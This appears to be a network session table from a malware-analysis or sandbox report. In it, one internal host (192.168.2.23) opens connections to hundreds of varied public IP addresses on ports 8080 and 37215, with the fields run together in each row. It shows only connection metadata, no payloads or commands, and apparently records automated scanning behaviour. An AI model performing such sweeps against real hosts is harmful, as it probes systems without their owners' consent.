                                                        20979192.168.2.23563142.54.191.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20980192.168.2.234332080.35.84.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20981192.168.2.235039059.100.63.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20982192.168.2.2347270132.31.49.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20983192.168.2.2346300128.40.59.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20984192.168.2.234659219.141.236.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20985192.168.2.234153069.160.71.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20986192.168.2.234076032.136.246.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20987192.168.2.2340028144.64.249.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20988192.168.2.2353296116.199.57.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20989192.168.2.233552086.221.159.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20990192.168.2.234137019.112.23.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20991192.168.2.235313267.241.58.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20992192.168.2.2341826209.191.149.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20993192.168.2.2354586139.201.168.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20994192.168.2.234168885.247.151.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20995192.168.2.2360502208.153.173.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20996192.168.2.2347186170.163.217.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20997192.168.2.2333180161.231.205.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20998192.168.2.234774469.161.182.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20999192.168.2.2343468124.142.88.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21000192.168.2.234084047.42.27.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21001192.168.2.2347268156.235.57.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21002192.168.2.2348832194.58.135.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21003192.168.2.235415083.59.207.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21004192.168.2.235662665.128.183.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21005192.168.2.2341882135.180.157.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21006192.168.2.2340858157.248.158.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21007192.168.2.2346272103.171.98.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21008192.168.2.2345340217.17.59.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21009192.168.2.233823092.122.57.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21010192.168.2.234583870.36.100.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21011192.168.2.2348704118.161.119.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21012192.168.2.2347316131.210.23.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21013192.168.2.2338108118.177.167.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21014192.168.2.235431883.166.160.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21015192.168.2.2351686203.88.127.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21016192.168.2.2351030181.187.23.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21017192.168.2.2346938202.210.141.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21018192.168.2.2342318168.245.78.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21019192.168.2.2357048109.42.5.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21020192.168.2.235624448.136.185.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21021192.168.2.235995488.41.236.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21022192.168.2.234085445.58.102.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21023192.168.2.2359464138.53.127.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21024192.168.2.2360566188.167.205.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21025192.168.2.2360776100.206.88.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21026192.168.2.235217448.80.64.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21027192.168.2.2338060141.173.251.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21028192.168.2.2334072115.200.170.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21029192.168.2.233709682.54.232.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21030192.168.2.2357200193.191.113.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21031192.168.2.2350874204.193.172.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21032192.168.2.234347046.241.3.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21033192.168.2.2348138117.28.35.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21034192.168.2.2360746144.53.197.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21035192.168.2.2354700139.10.97.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21036192.168.2.23334662.21.93.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21037192.168.2.234622814.140.13.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21038192.168.2.2351994219.39.140.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21039192.168.2.2342192150.141.129.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21040192.168.2.236052294.37.61.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21041192.168.2.2342224102.230.86.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21042192.168.2.2336490208.61.136.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21043192.168.2.233427469.212.237.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21044192.168.2.233788463.7.2.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21045192.168.2.2349896206.61.248.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21046192.168.2.23440068.123.1.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21047192.168.2.234606487.244.42.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21048192.168.2.2339252138.154.217.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21049192.168.2.235308695.131.197.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21050192.168.2.2341722126.212.207.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21051192.168.2.2355480156.69.68.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21052192.168.2.235349218.56.15.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21053192.168.2.2356290129.179.151.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21054192.168.2.235917625.0.213.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21055192.168.2.2349644122.234.122.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21056192.168.2.2355286154.5.2.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21057192.168.2.2335874124.81.27.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21058192.168.2.2351534184.185.191.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21059192.168.2.233302842.124.56.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21060192.168.2.2343270137.233.127.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21061192.168.2.233602065.12.183.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21062192.168.2.2347786180.250.39.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21063192.168.2.2344750141.250.16.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21064192.168.2.233684084.164.25.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21065192.168.2.2359600113.224.245.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21066192.168.2.235380491.154.137.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21067192.168.2.2358222107.245.57.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21068192.168.2.2355746182.43.123.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21069192.168.2.2338310143.99.107.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21070192.168.2.23442801.91.34.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21071192.168.2.234413218.200.140.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21072192.168.2.2347640141.98.20.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21073192.168.2.2334848176.24.48.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21074192.168.2.235413225.98.53.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21075192.168.2.234484675.235.130.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21076192.168.2.2334558182.77.253.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21077192.168.2.234144697.197.59.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21078192.168.2.234144423.227.201.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21079192.168.2.2336452182.74.164.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21080192.168.2.23340969.244.108.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21081192.168.2.2359314174.159.219.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21082192.168.2.233449031.195.170.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21083192.168.2.2343928110.105.140.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21084192.168.2.2344284182.194.84.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21085192.168.2.235893084.246.131.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21086192.168.2.2355224116.151.160.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21087192.168.2.2347942183.250.59.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21088192.168.2.233553643.55.56.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21089192.168.2.2344356158.70.119.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21090192.168.2.233824834.153.6.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21091192.168.2.2356992129.106.127.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21092192.168.2.235196281.125.10.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21093192.168.2.2334128170.176.97.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21094192.168.2.2345796211.90.219.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21095192.168.2.2334558193.83.246.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21096192.168.2.234470427.13.238.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21097192.168.2.2337422162.78.7.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21098192.168.2.233526441.168.127.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21099192.168.2.235551685.36.180.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21100192.168.2.235473696.35.229.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21101192.168.2.2352442140.166.172.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21102192.168.2.2356988218.216.243.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21103192.168.2.235033270.216.171.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21104192.168.2.2338494125.166.187.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21105192.168.2.2338948186.159.58.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21106192.168.2.2337278189.122.104.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21107192.168.2.2346662116.170.181.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21108192.168.2.234845894.160.114.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21109192.168.2.2355540208.135.116.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21110192.168.2.2339734202.25.63.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21111192.168.2.2343276155.225.180.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21112192.168.2.2342724172.1.115.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21113192.168.2.2352798171.151.213.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21114192.168.2.2352040131.226.171.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21115192.168.2.233883614.157.205.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21116192.168.2.235800813.164.141.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21117192.168.2.2346248193.5.39.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21118192.168.2.2339814208.46.42.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21119192.168.2.234914476.43.110.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21120192.168.2.234504842.186.239.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21121192.168.2.2334880202.78.114.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21122192.168.2.233704643.199.83.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21123192.168.2.2352464196.183.23.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21124192.168.2.233952492.95.48.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21125192.168.2.2351466188.131.24.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21126192.168.2.2346304172.217.39.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21127192.168.2.2348494186.161.30.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21128192.168.2.2355056147.7.247.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21129192.168.2.2337160101.115.152.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21130192.168.2.2355204185.226.217.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21131192.168.2.2353268125.45.124.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21132192.168.2.235283476.74.237.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21133192.168.2.2349814102.31.228.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21134192.168.2.234541899.58.59.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21135192.168.2.235800460.146.214.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21136192.168.2.2340390180.240.184.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21137192.168.2.2342118125.41.123.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21138192.168.2.23600801.229.78.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21139192.168.2.2344804165.245.194.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21140192.168.2.2358420181.119.152.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21141192.168.2.2340554125.172.7.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21142192.168.2.233401046.199.151.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21143192.168.2.2353292201.146.83.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21144192.168.2.234018084.250.61.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21145192.168.2.235919471.137.52.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21146192.168.2.2356026144.140.129.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21147192.168.2.2341892146.167.203.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21148192.168.2.2349876144.140.147.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21149192.168.2.234289654.48.114.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21150192.168.2.2337064157.39.253.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21151192.168.2.2343680193.137.180.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21152192.168.2.2344332160.82.146.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21153192.168.2.2350396163.134.248.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21154192.168.2.235021268.253.67.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21155192.168.2.2352840217.94.182.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21156192.168.2.235785244.168.49.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21157192.168.2.235076047.175.22.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21158192.168.2.2333894136.141.245.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21159192.168.2.2339970179.87.119.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21160192.168.2.234488671.81.9.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21161192.168.2.234776288.116.7.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21162192.168.2.233303441.132.47.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21163192.168.2.235301841.183.39.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21164192.168.2.2345494114.249.172.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21165192.168.2.234735673.241.59.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21166192.168.2.2357700157.243.166.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21167192.168.2.2345418157.148.185.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21168192.168.2.2337872165.115.93.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21169192.168.2.2351902157.186.133.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21170192.168.2.2360432197.32.74.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21171192.168.2.235422841.145.235.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21172192.168.2.235346041.1.1.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21173192.168.2.2340198157.146.82.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21174192.168.2.235246241.211.136.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21175192.168.2.2337472157.239.36.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21176192.168.2.2333776197.16.104.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21177192.168.2.233534076.226.114.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21178192.168.2.2359362197.13.157.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21179192.168.2.2343098197.249.119.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21180192.168.2.2344186197.15.38.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21181192.168.2.2360664197.85.4.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21182192.168.2.2350540157.247.1.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21183192.168.2.2347752212.74.160.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21184192.168.2.2340586157.28.82.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21185192.168.2.2360674157.226.61.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21186192.168.2.2346898144.53.102.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21187192.168.2.2349046197.126.156.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21188192.168.2.2337676216.98.52.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21189192.168.2.235103841.88.191.11637215
